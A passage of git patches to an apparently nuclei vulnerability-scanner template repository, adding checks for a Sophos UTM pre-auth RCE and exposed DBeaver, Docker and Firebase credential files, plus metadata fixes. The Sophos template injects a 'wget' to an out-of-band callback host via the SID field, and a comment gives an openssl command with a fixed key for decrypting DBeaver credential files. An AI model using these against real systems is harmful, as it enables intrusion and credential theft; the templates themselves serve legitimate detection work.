+++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2020/CVE-2020-25223.yaml diff --git a/cves/2020/CVE-2020-25223.yaml b/cves/2020/CVE-2020-25223.yaml new file mode 100644 index 0000000000..44e572209f --- /dev/null +++ b/cves/2020/CVE-2020-25223.yaml @@ -0,0 +1,36 @@ +id: CVE-2020-25223 + +info: + name: Sophos UTM - Preauth RCE + author: gy741 + severity: critical + description: A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11 + reference: | + - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223 + tags: cve,cve2020,sophos,rce,oob + +requests: + - raw: + - | + POST /var HTTP/1.1 + Host: {{Hostname}} + Accept: text/javascript, text/html, application/xml, text/xml, */* + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + X-Requested-With: XMLHttpRequest + X-Prototype-Version: 1.5.1.1 + Content-type: application/json; charset=UTF-8 + Origin: {{BaseURL}} + Connection: close + Referer: {{BaseURL}} + Sec-Fetch-Dest: empty + Sec-Fetch-Mode: cors + Sec-Fetch-Site: same-origin + + {"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true} + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From c980eea40b1470b518cd718307d54d979c83a2fa Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 19 Aug 2021 16:32:09 +0530 Subject: [PATCH 1736/4083] Create dbeaver-credentials.yaml --- exposures/configs/dbeaver-credentials.yaml | 26 ++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposures/configs/dbeaver-credentials.yaml diff --git a/exposures/configs/dbeaver-credentials.yaml b/exposures/configs/dbeaver-credentials.yaml new file mode 100644 index 0000000000..e9e66f7357 --- /dev/null +++ b/exposures/configs/dbeaver-credentials.yaml @@ -0,0 +1,26 @@ +id: dbeaver-credentials + +info: + name: DBeaver Credential Exposure + author: geeknik + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/.dbeaver/credentials-config.json" + # to decode the above file, run this: + # openssl aes-128-cbc -d -K "babb4a9f774ab853c96c2d653dfe544a" -iv 00000000000000000000000000000000 -in credentials-config.json | dd bs=1 skip=16 2>/dev/null + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "application/octet-stream" + part: header + - type: dsl + dsl: + - "len(body) >=200 && len(body) <400" From d7e7c39982417530e1f6232fbcddf3c5fb7c6e77 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 19 Aug 2021 16:34:32 +0530 Subject: [PATCH 1737/4083] Update dbeaver-credentials.yaml --- exposures/configs/dbeaver-credentials.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/exposures/configs/dbeaver-credentials.yaml b/exposures/configs/dbeaver-credentials.yaml index e9e66f7357..f1042118c6 100644 --- a/exposures/configs/dbeaver-credentials.yaml +++ b/exposures/configs/dbeaver-credentials.yaml @@ -4,13 +4,16 @@ info: name: DBeaver Credential Exposure author: geeknik severity: info + tags: exposure,dbeaver + +# to decode the above file, run this: +# openssl aes-128-cbc -d -K "babb4a9f774ab853c96c2d653dfe544a" -iv 00000000000000000000000000000000 -in credentials-config.json | dd bs=1 skip=16 2>/dev/null + requests: - method: GET path: - "{{BaseURL}}/.dbeaver/credentials-config.json" - # to decode the above file, run this: - # openssl aes-128-cbc -d -K "babb4a9f774ab853c96c2d653dfe544a" -iv 00000000000000000000000000000000 -in credentials-config.json | dd bs=1 skip=16 2>/dev/null matchers-condition: and matchers: @@ -21,6 +24,3 @@ requests: words: - "application/octet-stream" part: header - - type: dsl - dsl: - - "len(body) >=200 && len(body) <400" From 3a8b5df438cf0af6dc8feb3c2acb359bd97deef4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 19 Aug 2021 16:35:50 +0530 Subject: [PATCH 1738/4083] Update CVE-2020-25223.yaml --- cves/2020/CVE-2020-25223.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-25223.yaml b/cves/2020/CVE-2020-25223.yaml index 44e572209f..a80fc39305 100644 --- a/cves/2020/CVE-2020-25223.yaml +++ b/cves/2020/CVE-2020-25223.yaml @@ -26,7 +26,7 @@ requests: Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin - + {"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true} matchers: From 2e4c8e22f23d0c05a58b27d694c4cc3ab7aeb711 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 19 Aug 2021 16:47:22 +0530 Subject: [PATCH 1739/4083] Create dockercfg.yaml --- exposures/tokens/docker/dockercfg.yaml | 29 ++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposures/tokens/docker/dockercfg.yaml diff --git a/exposures/tokens/docker/dockercfg.yaml b/exposures/tokens/docker/dockercfg.yaml new file mode 100644 index 0000000000..5f426c2785 --- /dev/null +++ b/exposures/tokens/docker/dockercfg.yaml @@ -0,0 +1,29 @@ +id: dockercfg + +info: + name: Detect .dockercfg + author: geeknik + description: Docker registry authentication data + severity: high + tags: docker,auth + +requests: + - method: GET + path: + - "{{BaseURL}}/.dockercfg" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "text/plain" + - type: word + words: + - "https" + - "email" + - "auth" + condition: and + - type: status + status: + - 200 From acbacf339d382e16727474016631e34028a0b7a3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 19 Aug 2021 16:48:50 +0530 Subject: [PATCH 1740/4083] Update dockercfg.yaml --- exposures/tokens/docker/dockercfg.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/exposures/tokens/docker/dockercfg.yaml b/exposures/tokens/docker/dockercfg.yaml index 5f426c2785..78974e1adb 100644 --- a/exposures/tokens/docker/dockercfg.yaml +++ b/exposures/tokens/docker/dockercfg.yaml @@ -3,9 +3,9 @@ id: dockercfg info: name: Detect .dockercfg author: geeknik - description: Docker registry authentication data severity: high - tags: docker,auth + description: Docker registry authentication data + tags: docker,exposure requests: - method: GET @@ -18,12 +18,13 @@ requests: part: header words: - "text/plain" + - type: word words: - - "https" - - "email" - - "auth" + - '"email":' + - '"auth":' condition: and + - type: status status: - 200 From f65a78bb5ca82908d3e7942ae5081295f5dd4ffc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 19 Aug 2021 16:56:13 +0530 Subject: [PATCH 1741/4083] Create firebase-config-exposure.yaml --- .../configs/firebase-config-exposure.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 exposures/configs/firebase-config-exposure.yaml diff --git a/exposures/configs/firebase-config-exposure.yaml b/exposures/configs/firebase-config-exposure.yaml new file mode 100644 index 0000000000..344616fa69 --- /dev/null +++ b/exposures/configs/firebase-config-exposure.yaml @@ -0,0 +1,33 @@ +id: firebase-config-exposure + +info: + name: Firebase Config Exposure + author: geeknik + reference: https://github.com/firebase/firebaseui-web/blob/master/demo/public/sample-config.js + severity: high + tags: firebase,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/public/config.js" + - "{{BaseURL}}/config.js" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "text/plain" + + - type: word + words: + - "apiKey:" + - "authDomain:" + - "databaseURL:" + - "storageBucket:" + condition: and + + - type: status + status: + - 200 From e68d15ab63d5bc5bfb190b936d6440e6e8adb469 Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Thu, 19 Aug 2021 15:30:14 +0300 Subject: [PATCH 1742/4083] Fixed mistakes/typos in the templates. Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 --- cves/2015/CVE-2015-8813.yaml | 2 +- cves/2016/CVE-2016-0957.yaml | 4 ++-- cves/2017/CVE-2017-16806.yaml | 2 +- cves/2018/CVE-2018-2894.yaml | 2 +- cves/2019/CVE-2019-17558.yaml | 2 +- cves/2019/CVE-2019-18394.yaml | 2 +- cves/2019/CVE-2019-19985.yaml | 2 +- cves/2019/CVE-2019-20141.yaml | 2 +- exposed-panels/zte-panel.yaml | 2 +- exposures/configs/exposed-gitignore.yaml | 2 +- vulnerabilities/other/etouch-v2-sqli.yaml | 2 +- vulnerabilities/other/jfrog-unauth-build-exposed.yaml | 2 +- vulnerabilities/other/zms-auth-bypass.yaml | 2 +- 13 files changed, 14 insertions(+), 14 deletions(-) diff --git a/cves/2015/CVE-2015-8813.yaml b/cves/2015/CVE-2015-8813.yaml index b8ac27b189..35e2bc110b 100644 --- a/cves/2015/CVE-2015-8813.yaml +++ b/cves/2015/CVE-2015-8813.yaml @@ -5,7 +5,7 @@ info: author: emadshanab severity: high description: A Server Side Request Forgery (SSRF) vulnerability in Umbraco in Feedproxy.aspx allows attackers to send arbitrary HTTP GET requests.Once you change the URL to the http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index, you able to access the localhost application of the server - refrense: | + reference: - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 tags: cve,cve2015,ssrf,oob diff --git a/cves/2016/CVE-2016-0957.yaml b/cves/2016/CVE-2016-0957.yaml index 8dc7b5b7e6..676d804499 100644 --- a/cves/2016/CVE-2016-0957.yaml +++ b/cves/2016/CVE-2016-0957.yaml @@ -12,8 +12,8 @@ requests: - method: GET path: - "{{BaseURL}}/system/console?.css" - header: - - Authorization: "Basic YWRtaW46YWRtaW4K" + headers: + Authorization: "Basic YWRtaW46YWRtaW4K" matchers-condition: and matchers: diff --git a/cves/2017/CVE-2017-16806.yaml b/cves/2017/CVE-2017-16806.yaml index b49f7913cd..ef7744125e 100644 --- a/cves/2017/CVE-2017-16806.yaml +++ b/cves/2017/CVE-2017-16806.yaml @@ -22,5 +22,5 @@ requests: regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" - conditon: or + condition: or part: body diff --git a/cves/2018/CVE-2018-2894.yaml b/cves/2018/CVE-2018-2894.yaml index 793bb0e89a..7b96e235fa 100644 --- a/cves/2018/CVE-2018-2894.yaml +++ b/cves/2018/CVE-2018-2894.yaml @@ -19,4 +19,4 @@ requests: words: - "* Copyright (c) 2005,2013, Oracle" - "settings" - conditon: and \ No newline at end of file + condition: and \ No newline at end of file diff --git a/cves/2019/CVE-2019-17558.yaml b/cves/2019/CVE-2019-17558.yaml index 9a90fab202..2a5e43edd8 100644 --- a/cves/2019/CVE-2019-17558.yaml +++ b/cves/2019/CVE-2019-17558.yaml @@ -3,7 +3,7 @@ info: name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template author: pikpikcu,madrobot severity: critical - refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558 + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17558 tags: cve,cve2019,apache,rce,solr requests: diff --git a/cves/2019/CVE-2019-18394.yaml b/cves/2019/CVE-2019-18394.yaml index 853e3f08d8..389cc72ec4 100644 --- a/cves/2019/CVE-2019-18394.yaml +++ b/cves/2019/CVE-2019-18394.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: critical description: A Server Side Request Forgery (SSRF) vulnerability in FaviconServlet.java in Ignite Realtime Openfire through 4.4.2 allows attackers to send arbitrary HTTP GET requests. - refrense: | + reference: - https://swarm.ptsecurity.com/openfire-admin-console/ - https://github.com/igniterealtime/Openfire/pull/1497 tags: cve,cve2019,ssrf,openfire,oob diff --git a/cves/2019/CVE-2019-19985.yaml b/cves/2019/CVE-2019-19985.yaml index 0d20df8d6a..6d1138f5ce 100644 --- a/cves/2019/CVE-2019-19985.yaml +++ b/cves/2019/CVE-2019-19985.yaml @@ -5,7 +5,7 @@ info: author: KBA@SOGETI_ESEC,madrobot,dwisiswant0 severity: medium description: The WordPress plugin, Email Subscribers & Newsletters, before 4.2.3 had a flaw that allowed unauthenticated file download with user information disclosure. - refrense: https://www.exploit-db.com/exploits/48698 + reference: https://www.exploit-db.com/exploits/48698 tags: cve,cve2019,wordpress,wp-plugin requests: diff --git a/cves/2019/CVE-2019-20141.yaml b/cves/2019/CVE-2019-20141.yaml index 99e6a3915c..e94d8eb197 100644 --- a/cves/2019/CVE-2019-20141.yaml +++ b/cves/2019/CVE-2019-20141.yaml @@ -5,7 +5,7 @@ info: author: knassar702 severity: medium description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter. - refrense: https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html + reference: https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html tags: cve,cve2019,xss requests: diff --git a/exposed-panels/zte-panel.yaml b/exposed-panels/zte-panel.yaml index d37d9038d4..2ee12cdf1f 100644 --- a/exposed-panels/zte-panel.yaml +++ b/exposed-panels/zte-panel.yaml @@ -16,7 +16,7 @@ requests: - "ZTE Corporation. All rights reserved. " - '' part: body - condtion: and + condition: and - type: word words: diff --git a/exposures/configs/exposed-gitignore.yaml b/exposures/configs/exposed-gitignore.yaml index aaef2e6431..b1b2a4644a 100644 --- a/exposures/configs/exposed-gitignore.yaml +++ b/exposures/configs/exposed-gitignore.yaml @@ -36,4 +36,4 @@ requests: - "image/" part: all negative: true - condtion: or \ No newline at end of file + condition: or \ No newline at end of file diff --git a/vulnerabilities/other/etouch-v2-sqli.yaml b/vulnerabilities/other/etouch-v2-sqli.yaml index f3dd0fe611..963398de58 100644 --- a/vulnerabilities/other/etouch-v2-sqli.yaml +++ b/vulnerabilities/other/etouch-v2-sqli.yaml @@ -4,7 +4,7 @@ info: author: princechaddha severity: high tags: etouch,sqli - refrence: | + reference: - https://github.com/mstxq17/CodeCheck/ - https://www.anquanke.com/post/id/168991 diff --git a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml index c106f95dbd..fd92d1f28d 100644 --- a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml +++ b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml @@ -4,7 +4,7 @@ info: name: JFrog Unauthentication Builds author: dhiyaneshDK severity: medium - referemce: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml + reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml tags: jfrog requests: diff --git a/vulnerabilities/other/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml index 689b25ebb5..68e0db9695 100644 --- a/vulnerabilities/other/zms-auth-bypass.yaml +++ b/vulnerabilities/other/zms-auth-bypass.yaml @@ -4,7 +4,7 @@ info: name: Zoo Management System 1.0 - Authentication Bypass author: dwisiswant0 severity: high - refernce: https://www.exploit-db.com/exploits/48880 + reference: https://www.exploit-db.com/exploits/48880 requests: - raw: From 0b432b341b35360724ce7251fabdf1fac9c4e433 Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Thu, 19 Aug 2021 16:15:35 +0300 Subject: [PATCH 1743/4083] Added comments with URLs under the "references" field Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 --- cves/2017/CVE-2017-10271.yaml | 6 +++--- cves/2017/CVE-2017-11444.yaml | 7 +++---- cves/2017/CVE-2017-14537.yaml | 2 +- cves/2018/CVE-2018-16763.yaml | 8 ++++---- cves/2018/CVE-2018-17431.yaml | 7 +++---- cves/2019/CVE-2019-7256.yaml | 7 +++---- cves/2020/CVE-2020-0618.yaml | 7 +++---- cves/2020/CVE-2020-10148.yaml | 11 +++++------ cves/2020/CVE-2020-12720.yaml | 5 ----- cves/2020/CVE-2020-15505.yaml | 16 +++++----------- cves/2020/CVE-2020-24223.yaml | 9 ++++----- cves/2020/CVE-2020-24312.yaml | 6 +++--- cves/2020/CVE-2020-5776.yaml | 1 - cves/2020/CVE-2020-5777.yaml | 2 -- cves/2020/CVE-2020-7209.yaml | 12 +++++------- cves/2020/CVE-2020-9496.yaml | 9 +-------- cves/2021/CVE-2021-22122.yaml | 8 -------- cves/2021/CVE-2021-26295.yaml | 1 - .../grafana/grafana-default-credential.yaml | 8 +++++--- .../solarwinds/solarwinds-default-admin.yaml | 3 --- dns/azure-takeover-detection.yaml | 6 +++--- exposures/configs/alibaba-canal-info-leak.yaml | 8 ++++---- technologies/clockwork-php-page.yaml | 3 ++- technologies/firebase-detect.yaml | 2 +- technologies/liferay-portal-detect.yaml | 4 ++-- .../jira/jira-unauthenticated-dashboards.yaml | 2 +- vulnerabilities/other/rconfig-rce.yaml | 8 ++++---- vulnerabilities/other/sick-beard-xss.yaml | 9 +++++---- .../springboot/springboot-h2-db-rce.yaml | 1 - .../wordpress/wordpress-emergency-script.yaml | 2 -- 30 files changed, 70 insertions(+), 110 deletions(-) diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index f9456e6b9f..be45ec2616 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -5,11 +5,11 @@ info: author: dr_set severity: high description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. - reference: https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 + reference: + - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 + - https://github.com/SuperHacker-liuan/cve-2017-10271-poc tags: cve,cve2017,rce,oracle,weblogic - # Source:- https://github.com/SuperHacker-liuan/cve-2017-10271-poc - requests: - raw: - | diff --git a/cves/2017/CVE-2017-11444.yaml b/cves/2017/CVE-2017-11444.yaml index dff3a19741..0af1f0dba3 100644 --- a/cves/2017/CVE-2017-11444.yaml +++ b/cves/2017/CVE-2017-11444.yaml @@ -5,12 +5,11 @@ info: author: dwisiswant0 severity: high description: Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array. - reference: https://github.com/intelliants/subrion/issues/479 + reference: + - https://github.com/intelliants/subrion/issues/479 + - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q tags: cve,cve2017,sqli,subrion - # Source: - # - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q - requests: - method: GET path: diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml index bcfd8edfaf..6ccc47bee7 100644 --- a/cves/2017/CVE-2017-14537.yaml +++ b/cves/2017/CVE-2017-14537.yaml @@ -9,7 +9,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-14537 - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ - - Product vendor:-https://sourceforge.net/projects/asteriskathome/ + - https://sourceforge.net/projects/asteriskathome/ # vendor homepage requests: - raw: diff --git a/cves/2018/CVE-2018-16763.yaml b/cves/2018/CVE-2018-16763.yaml index 0f46ced01e..b59d969f15 100644 --- a/cves/2018/CVE-2018-16763.yaml +++ b/cves/2018/CVE-2018-16763.yaml @@ -5,10 +5,10 @@ info: author: pikpikcu severity: critical tags: cve,cve2018,fuelcms,rce - -# Vendor Homepage: https://www.getfuelcms.com/ -# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 -# reference: https://www.exploit-db.com/exploits/47138 + reference: + - https://www.exploit-db.com/exploits/47138 + - https://www.getfuelcms.com/ # Vendor Homepage + - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 # Software Link requests: - raw: diff --git a/cves/2018/CVE-2018-17431.yaml b/cves/2018/CVE-2018-17431.yaml index eb30317433..0a5c845723 100644 --- a/cves/2018/CVE-2018-17431.yaml +++ b/cves/2018/CVE-2018-17431.yaml @@ -6,10 +6,9 @@ info: severity: critical description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based) tags: cve,cve2018,comodo,rce - - # References: - # - https://www.exploit-db.com/exploits/48825 - # - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 + reference: + - https://www.exploit-db.com/exploits/48825 + - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 requests: - raw: diff --git a/cves/2019/CVE-2019-7256.yaml b/cves/2019/CVE-2019-7256.yaml index d5fb7ff1cf..93e7ed7adb 100644 --- a/cves/2019/CVE-2019-7256.yaml +++ b/cves/2019/CVE-2019-7256.yaml @@ -5,12 +5,11 @@ info: author: pikpikcu severity: critical description: Linear eMerge E3-Series devices allow Command Injections. - reference: https://www.exploit-db.com/exploits/47619 + reference: + - https://www.exploit-db.com/exploits/47619 + - http://linear-solutions.com/nsc_family/e3-series/ # vendor homepage tags: cve,cve2019,emerge,rce -# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ -# Software Link: http://linear-solutions.com/nsc_family/e3-series/ - requests: - raw: # Default Port - | diff --git a/cves/2020/CVE-2020-0618.yaml b/cves/2020/CVE-2020-0618.yaml index 6ba8a88aee..b593db8f88 100644 --- a/cves/2020/CVE-2020-0618.yaml +++ b/cves/2020/CVE-2020-0618.yaml @@ -5,15 +5,14 @@ info: author: joeldeleep description: A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability'. severity: high + # THIS TEMPLATE IS ONLY FOR DETECTING + # To carry out further attacks, please see reference[1] below. + # This template works by guessing user ID. reference: - https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/ - https://github.com/euphrat1ca/CVE-2020-0618 tags: cve,cve2020,rce - # THIS TEMPLATE IS ONLY FOR DETECTING - # To carry out further attacks, please see reference[1] below. - # This template works by guessing user ID. - requests: - method: GET path: diff --git a/cves/2020/CVE-2020-10148.yaml b/cves/2020/CVE-2020-10148.yaml index e505f4797d..f7958eb7cb 100644 --- a/cves/2020/CVE-2020-10148.yaml +++ b/cves/2020/CVE-2020-10148.yaml @@ -7,14 +7,13 @@ info: description: | This template could allow to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. - reference: https://kb.cert.org/vuls/id/843464 + reference: + - https://kb.cert.org/vuls/id/843464 + - https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/solarwinds-lfi-cve-2020-10148.yaml + - https://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965 + - https://twitter.com/0xsha/status/1343800953946787847 tags: cve,cve2020,solarwinds,rce - # References: - # - https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/solarwinds-lfi-cve-2020-10148.yaml - # - https://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965 - # - https://twitter.com/0xsha/status/1343800953946787847 - requests: - method: GET path: diff --git a/cves/2020/CVE-2020-12720.yaml b/cves/2020/CVE-2020-12720.yaml index cf0dc3791a..2bc9a5a142 100644 --- a/cves/2020/CVE-2020-12720.yaml +++ b/cves/2020/CVE-2020-12720.yaml @@ -8,11 +8,6 @@ info: reference: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720 tags: cve,cve2020,vbulletin,sqli - # Source https://github.com/rekter0/exploits/tree/master/CVE-2020-12720 - # This template supports the detection part only. - # Do not test any website without permission - # https://github.com/swisskyrepo/nuclei-templates/blob/20179794c2030144ec85f0231a8d455b5d7e35c5/cves/CVE-2020-12720.yaml - requests: - raw: - | diff --git a/cves/2020/CVE-2020-15505.yaml b/cves/2020/CVE-2020-15505.yaml index 45205e7076..15ac2adc6c 100644 --- a/cves/2020/CVE-2020-15505.yaml +++ b/cves/2020/CVE-2020-15505.yaml @@ -6,23 +6,17 @@ info: severity: critical description: | A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors. - reference: | + # THIS TEMPLATE IS ONLY FOR DETECTING + # To carry out further attacks, please see reference[2] below. + # This template works by passing a Hessian header, otherwise; + # it will return a 403 or 500 internal server error. Reference[3]. + reference: - https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html - https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505 - https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10 - https://github.com/orangetw/JNDI-Injection-Bypass tags: cve,cve2020,mobileiron,rce - # THIS TEMPLATE IS ONLY FOR DETECTING - # To carry out further attacks, please see references[2] below. - # This template works by passing a Hessian header, otherwise; - # it will return a 403 or 500 internal server error. References[3]. - # References: - # - [1] https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html - # - [2] https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505 - # - [3] https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10 - # - [4] https://github.com/orangetw/JNDI-Injection-Bypass - requests: - raw: - | diff --git a/cves/2020/CVE-2020-24223.yaml b/cves/2020/CVE-2020-24223.yaml index 31a1bf6446..e5674758dd 100644 --- a/cves/2020/CVE-2020-24223.yaml +++ b/cves/2020/CVE-2020-24223.yaml @@ -5,13 +5,12 @@ info: author: pikpikcu severity: medium description: Mara CMS 7.5 allows cross-site scripting (XSS) in contact.php via the theme or pagetheme parameters. - reference: https://www.exploit-db.com/exploits/48777 + reference: + - https://www.exploit-db.com/exploits/48777 + - https://sourceforge.net/projects/maracms/ # vendor homepage + - https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # software link tags: cve,cve2020,mara,xss - # Vendor Homepage: https://sourceforge.net/projects/maracms/ - # Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download - # Source: https://www.exploit-db.com/exploits/48777 - requests: - method: GET path: diff --git a/cves/2020/CVE-2020-24312.yaml b/cves/2020/CVE-2020-24312.yaml index 81cc8aafe4..395f254458 100644 --- a/cves/2020/CVE-2020-24312.yaml +++ b/cves/2020/CVE-2020-24312.yaml @@ -6,11 +6,11 @@ info: severity: high description: | mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken. - reference: https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/ + reference: + - https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-24312 tags: cve,cve2020,wordpress,backups - # NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-24312 - # Source: https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/ # Note: Manually check content requests: diff --git a/cves/2020/CVE-2020-5776.yaml b/cves/2020/CVE-2020-5776.yaml index e8b8df0a28..af8c29283c 100644 --- a/cves/2020/CVE-2020-5776.yaml +++ b/cves/2020/CVE-2020-5776.yaml @@ -12,7 +12,6 @@ info: # in the event that a CSRF is leveraged against an existing admin session for MAGMI. # At the time of this advisory, no patch exists for this issue. - requests: - raw: - | diff --git a/cves/2020/CVE-2020-5777.yaml b/cves/2020/CVE-2020-5777.yaml index 2781b85b50..830da22728 100644 --- a/cves/2020/CVE-2020-5777.yaml +++ b/cves/2020/CVE-2020-5777.yaml @@ -12,8 +12,6 @@ info: # While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php # whith default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=) # Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100 - # Ref: - # - https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35 requests: - raw: diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml index 74841a4ce3..2d8af1dd8c 100644 --- a/cves/2020/CVE-2020-7209.yaml +++ b/cves/2020/CVE-2020-7209.yaml @@ -7,17 +7,15 @@ info: tags: cve,cve2020,rce description: LinuxKI v6.0-1 and earlier is vulnerable to an remote code execution which is resolved in release 6.0-2. reference: - http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html - http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html - https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2 + - http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html + - http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html + - https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2 + 